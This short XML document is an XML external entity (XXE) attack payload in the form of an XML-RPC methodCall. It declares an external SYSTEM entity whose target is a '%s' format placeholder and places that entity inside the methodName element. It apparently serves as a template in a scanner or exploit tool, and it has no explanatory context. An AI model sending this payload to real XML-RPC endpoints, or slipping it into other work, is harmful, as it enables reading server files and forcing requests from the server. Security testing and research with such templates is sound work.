<?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT methodName ANY > <!ENTITY xxe SYSTEM "%s" > ]> <methodCall> <methodName>test&xxe;test</methodName> </methodCall>